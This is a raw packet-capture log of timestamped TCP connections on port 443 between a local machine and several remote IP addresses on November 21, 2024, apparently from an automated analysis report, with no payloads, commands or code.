                                                                                                                                                                              Nov 21, 2024 08:30:21.607228994 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.662060976 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.662240982 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.662338018 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.662391901 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.662410975 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.662453890 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.662462950 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.665129900 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.665157080 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.665245056 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.665465117 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.665482998 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.784471989 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.784563065 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.784673929 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.784920931 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.784940004 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.784950018 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.784955978 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.788090944 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.788116932 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.788197994 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.788374901 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.788388014 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.156116962 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.156224966 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.156357050 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:22.156399012 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:22.156419992 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.515724897 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:22.515775919 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.515990019 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:22.516170025 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:22.516185999 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.582751989 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.584233046 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.584283113 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.584348917 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.584367990 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.584373951 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.584378958 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.587052107 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.587074995 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.587173939 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.587326050 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:22.587336063 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.999450922 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:22.999495983 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:22.999563932 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:23.001276970 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:23.001291990 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.387784958 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.388164043 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.388195038 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.388820887 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.388825893 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.391366959 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.391732931 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.391747952 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.392347097 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.392352104 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.455574036 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.455926895 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.455938101 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.456370115 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.456374884 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.727458000 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.727561951 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:23.729201078 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:23.729207039 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.729507923 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.730873108 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:23.731030941 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:23.731035948 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.792113066 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.792668104 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.792707920 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.793134928 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.793143034 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.822221994 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.822304964 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.822366953 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.822581053 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.822581053 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.822602034 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.822613955 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.825546026 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.825624943 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.825727940 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.825938940 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.825992107 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.836474895 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.836565971 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.836627960 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.836782932 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.836797953 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.836807966 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.836812973 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.839378119 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.839468956 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.839556932 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.839696884 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.839731932 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.911797047 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.911905050 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.911968946 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.912153959 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.912184000 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.912198067 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.912205935 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.914901018 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.914927006 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:23.915020943 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.915335894 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:23.915349007 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.245237112 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.245384932 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.245500088 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.245716095 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.245735884 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.245745897 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.245750904 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.248462915 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.248547077 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.249090910 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.249245882 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.249264956 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.433976889 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.434755087 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.434781075 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.435353994 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.435359955 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.480634928 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.480726004 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.480834961 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:24.481019974 CET49731443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:24.481031895 CET44349731188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.707370996 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.707448959 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:24.709240913 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:24.709252119 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.709657907 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.763331890 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:24.768740892 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:24.815357924 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.888267040 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.888351917 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.888427973 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.888803959 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.888832092 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.888845921 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.888854027 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.892230034 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.892277002 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:24.892337084 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.892508984 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:24.892523050 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.038741112 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:25.038770914 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.038856030 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:25.039302111 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:25.039310932 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386142969 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386168003 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386174917 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386245012 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386260986 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.386295080 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386320114 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386353970 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.386370897 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.386370897 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.386400938 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.406513929 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.406593084 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.406599998 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.406642914 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.406761885 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.406776905 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.406826973 CET49733443192.168.2.620.109.210.53
                                                                                                                                                                              Nov 21, 2024 08:30:25.406835079 CET4434973320.109.210.53192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.611498117 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.612243891 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.612308979 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.612730980 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.612745047 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.622181892 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.622664928 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.622725964 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.623368025 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.623384953 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.697760105 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.698257923 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.698277950 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:25.698754072 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:25.698760033 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.028924942 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.029472113 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.029498100 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.030191898 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.030196905 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.054682970 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.054778099 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.054836035 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.054986000 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.055001974 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.055015087 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.055021048 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.057581902 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.057622910 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.057883024 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.058022022 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.058043003 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.066550016 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.066612005 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.066670895 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.066814899 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.066828966 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.066844940 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.066850901 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.068949938 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.069001913 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.069072008 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.069178104 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.069199085 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.142278910 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.142400026 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.142509937 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.142533064 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.142543077 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.142553091 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.142558098 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.145522118 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.145534992 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.145776987 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.145919085 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.145929098 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.348556995 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.348660946 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.350006104 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.350028992 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.350539923 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.356760025 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.357717037 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.357770920 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.357945919 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.357990026 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.358186007 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.358232021 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.358376980 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.358423948 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.358578920 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.358623028 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.358828068 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.358901978 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.358921051 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.358933926 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.359105110 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.359147072 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.359199047 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.359293938 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.359354019 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.403331041 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.403547049 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.403599977 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.403625965 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.403641939 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.403676033 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:26.403697968 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.474478006 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.474545002 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.474605083 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.474819899 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.474859953 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.474889994 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.474905968 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.477570057 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.477611065 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.477781057 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.477945089 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.477977037 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.674633980 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.675102949 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.675124884 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:26.675576925 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:26.675584078 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.118130922 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.118218899 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.118369102 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.118417025 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.118437052 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.118448973 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.118455887 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.121159077 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.121206045 CET4434974613.107.246.45192.168.2.6
